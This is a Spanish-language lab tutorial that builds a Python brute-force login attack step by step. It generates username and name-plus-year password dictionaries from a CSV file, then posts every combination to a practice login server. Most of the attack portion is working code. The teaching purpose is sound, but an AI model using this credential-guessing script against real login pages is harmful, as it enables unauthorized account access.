# **LABORATORIO 4 - ATAQUE DE FUERZA BRUTA**


En el siguiente laboratorio se creará un código en Python que permita realizar múltiples intentos de autenticación sobre una aplicación Web de manera automatizada, con el fin de encontrar credenciales válidas y acceder de forma no autorizada, este ataque es conocido normalmente como fuerza bruta.

## Parte 1

Teniendo como insumo un archivo csv que contiene los nombres de los usuarios que están autorizados en la aplicación, se creará un código en Python que generará los posibles nombres de usuario y contraseñas que se utilizarán en los intentos de login.

### Generación de usernames

Teniendo como insumo los nombres de los usuarios de la aplicación, el diccionario de usuarios se generará de las siguientes formas: 


*   Concatenando nombre y apellido (JhonDoe)
*   Obteniendo la primera letra del nombre y concatenandolo con el apellido (Jdoe)

Primero que todo debemos importar las funciones y librerías que vamos a usar:


``` python
import csv
from csv import DictReader
```


Vamos a generar una función llamada `generate_users_dict` para este propósito


``` python
def generate_users_dict(): 
```


En esta función debemos abrir el archivo donde se guardarán los nombres de usuario para poder escribir en él y cerrarlo al finalizar.


``` python
def generate_users_dict(): 
    file_1 = open("dic_users.txt","a+")
    .
    .
    .
    file_1.close()
```


hacemos uso de las funciones open y close. la función open recibe el nombre del archivo y un segundo parámetro `a+`, Abre un archivo para agregar texto al existente (appending) y crea el archivo si no existe.

También debemos abrir el archivo que contiene los nombres y apellidos de los usuarios de la aplicación `names.csv`. Para esto utilizaremos la declaración `with` que cerrará automáticamente el archivo después del bloque de código anidado, se abrirá el archivo con la función open y se le asignará un alias para facilitar el manejo:


``` python
with open('names.csv') as csvfile:
```


El código posterior al `with` deberá ir indentado. Para poder leer correctamente el archivo en formato csv, utilizaremos la función `DictReader `y recorreremos cada línea del archivo mediante un for.


``` python
def generate_users_dict(): 
    file_1 = open("dic_users.txt","a+")
    with open('names.csv') as csvfile:
        reader = DictReader(csvfile)
        for row in reader:
            .
            .
            .
    file_1.close()
```


De esta manera ya podemos procesar la información dentro de `names.csv` y escribir el resultado en `dic_users.txt`. 

Primero crearemos dos variables name y lastname que serán extraídas de cada línea del archivo names.csv en las interacciones del for.


``` python
name= str(row['Primer Nombre'])
lastname= str(row['Primer Apellido'])
```


Concatenamos la primera letra del nombre y apellido en la variable username y la escribimos al archivo resultante.


``` python
username = name[0] + lastname
file_1.write(username + "\n")
```


Luego concatenamos nombre completo y apellido en la variable username_type_2 y la escribimos al archivo resultante.


``` python
username_type_2 = name + lastname
file_1.write(username_type_2 + "\n")
```


Por último, el código de la función `generate_users_dict()` que dará de la siguiente manera:


``` python
import csv
from csv import DictReader

def generate_users_dict(): 
    file_1 = open("dic_users.txt","a+")
    with open('names.csv') as csvfile:
        reader = DictReader(csvfile)
        for row in reader:
            name= str(row['Primer Nombre'])
            lastname= str(row['Primer Apellido'])
            username = name[0] + lastname
            file_1.write(username + "\n")
            username_type_2 = name + lastname
            file_1.write(username_type_2 + "\n")
    file_1.close()
```



Recuerde que para que se ejecute  la función debe llamarla en el código.



``` python
generate_users_dict()
```


### Generación de passwords

Teniendo como insumo los nombres de los usuarios generados previamente, el diccionario de passwords se generará de la siguiente forma: 



*   Concatenando los posibles usernames con un año entre 2015 a 2021

Primero que todo debemos importar las funciones y librerías que vamos a usar:


``` python
import csv
from csv import DictReader
```


Definimos la variable `years` que contendrá los años que serán usados para generar las contraseñas.


``` python
years = ['2015','2016','2017','2018','2019','2020','2021']
```


Vamos a generar una función llamada `generate_users_password` para este propósito


``` python
def generate_users_password(): 
```


En esta función debemos abrir el archivo donde se guardarán las contraseñas, para poder escribir en él y cerrarlo al finalizar.


``` python
def generate_users_password(): 
    file_2 = open("dic_passwords.txt","a+")
    .
    .
    .
    file_2.close()
```


hacemos uso de las funciones open y close. la función open recibe el nombre del archivo y un segundo parámetro `a+`, Abre un archivo para agregar texto al existente (appending) y crea el archivo si no existe.

También debemos abrir el archivo que contiene los nombres y apellidos de los usuarios de la aplicación `names.csv`. Para esto utilizaremos la declaración `with` que cerrará automáticamente el archivo después del bloque de código anidado, se abrirá el archivo con la función open y se le asignará un alias para facilitar el manejo:


``` python
with open('names.csv') as csvfile:
```


El código posterior al `with` deberá ir indentado. Para poder leer correctamente el archivo en formato csv, utilizaremos la función `DictReader `y recorreremos cada línea del archivo mediante un for.


``` python
def generate_users_dict(): 
    file_2 = open("dic_passwords.txt","a+")
    with open('names.csv') as csvfile:
        reader = DictReader(csvfile)
        for row in reader:
            .
            .
            .
    file_2.close()
```


De esta manera ya podemos procesar la información dentro de `names.csv` y escribir el resultado en `dic_passwords.txt`. 

Crearemos dos variables name y lastname que serán extraídas de cada línea del archivo names.csv en las interacciones del for.


``` python
name= str(row['Primer Nombre'])
lastname= str(row['Primer Apellido'])
```


Concatenamos primera letra del nombre y apellido en la variable username, y nombre completo y apellido en la variable username_type_2.


``` python
username = name[0] + lastname
username_type_2 = name + lastname
```


Mediante un for vamos a recorrer la variable `years` para crear las posibles contraseñas y guardarlas en el archivo resultante:


``` python
            for year in years:
                username_type_3 = username + year
                file_2.write(username_type_3 + "\n")
                username_type_4 = username_type_2 + year
                file_2.write(username_type_4 + "\n")
```


Por último, el código de la función `generate_users_dict()` que dará de la siguiente manera:


``` python
def generate_users_password(): 
    file_2 = open("dic_passwords.txt","a+")
    with open('names.csv') as csvfile:
        reader = DictReader(csvfile)
        for row in reader:
            name= str(row['Primer Nombre'])
            lastname = str(row['Primer Apellido'])
            username = name[0] + lastname
            username_type_2 = name + lastname
            for year in years:
                username_type_3 = username + year
                file_2.write(username_type_3 + "\n")
                username_type_4 = username_type_2 + year
                file_2.write(username_type_4 + "\n")
    file_2.close()
```



Recuerde que para que se ejecute  la función debe llamarla en el código.



``` python
generate_users_password()
```

## Parte 2


En este punto del código ya se cuenta con los diccionarios creados y listos para ser utilizados, por lo tanto el siguiente paso es comenzar a realizar las peticiones de usuario y contraseña hacia el host que se quiere comprometer.

Debido a que muy seguramente se van a obtener múltiples mensajes de error, se debe utilizar la función `try` y `except`, la cual previene que el programa se detenga cuando se encuentren errores o excepciones en su ejecución.

A su vez, para realizar las peticiones al sitio web objetivo se debe utilizar la función `post` que tendrá como parámetros de entrada el host y las credenciales a probar.

 
Inicialmente se procede a generar la función “_make_login_request_” la cual va a recibir como valores de entrada el `username` y el `password` previamente elaborados.


``` python
def make_login_request(username, password):
    """
    Realiza las peticiones de usuario y contraseña
    """
```


Utilizando la función `try` - `except`, se definen las variables y acciones a realizar cuando se llame a la función. La variable `url` será el sitio web objetivo y dentro de la variable `body` se definen los usuarios y contraseñas que se van a utilizar en cada intento. 


``` python
url = 'https://Servidor-de-login.josedaviddavi34.repl.co/logon'
        body = {
            'username': username,
            'password': password
        }
```


Posteriormente se ejecuta la función `post` la cual realiza las peticiones con los parámetros de entrada `url` y `body`.


``` python
response = post(url, json=body)
```

Para tener un mayor control de esta función se imprimen las credenciales con las que se realizó la prueba y la respuesta obtenida. 


``` python
print ("intentando ",username,password)
print ('response es:', response.json())
```


Finalmente se declara la excepción que se va a utilizar, en este caso se asigna la variable error para almacenar el contenido de la causa del error y a su vez procederá a imprimir el error producido en la función print.


``` python
except Exception as error:
        print('Ocurrio al realizar la petición de login en el servidor:',error)
```


Finalmente, la función `make_login_request` queda definida de la siguiente manera:

 


``` python
def make_login_request(username, password):
    """
    Realiza las peticiones de usuario y contraseña
    """
    try:
        url = 'https://Servidor-de-login.josedaviddavi34.repl.co/logon'
        body = {
            'username': username,
            'password': password
        }
        response = post(url, json=body)
        print ("intentando ",username,password)
        print('response es:', response.json())
    except Exception as error:
        print('Ocurrio al realizar la petición de login en el servidor:',error)
```


 

Para finalizar el script se debe generar un ciclo donde se van a realizar varias iteraciones entre el cliente y el servidor con el objetivo de probar todas las credenciales posibles y encontrar la correcta.

Por lo tanto, se comienza utilizando la declaración `with` para abrir los archivos de usuarios y contraseñas, debidamente indentados. 


``` python
with open('dic_users.txt') as users:
    reader_users = users.readlines()
    with open('dic_passwords.txt') as passwords:
        reader_passwords = passwords.readlines()
```


Ahora se procede a iniciar dos ciclos `for` que se van a encargar de recorrer los 2 archivos previamente abiertos.


``` python
for user in reader_users:
            for password in reader_passwords:
```


A su vez, se requiere obtener cada usuario y cada contraseña sin ningún valor adicional, por lo tanto, se utiliza la función `replace`, la cual se encargará de tomar cada cada salto de línea y reemplazarlo por un valor nulo, como se aprecia en la siguiente estructura:


``` python
                user = user.replace("\n","")
                password =password.replace("\n","")
```


 

Para terminar, se llama la función `make_login_request` con los últimos valores de entrada previamente obtenidos para realizar la petición.


``` python
                make_login_request(user, password)
```


Por lo tanto, el ciclo final para realizar las peticiones queda de la siguiente manera:


``` python
# ciclo para generar varias peticiones al servidor iterando cada contraseña
with open('dic_users.txt') as users:
    reader_users = users.readlines()
    with open('dic_passwords.txt') as passwords:
        reader_passwords = passwords.readlines()
        for user in reader_users:
            for password in reader_passwords:
                user = user.replace("\n","")
                password =password.replace("\n","")
                make_login_request(user, password)
```

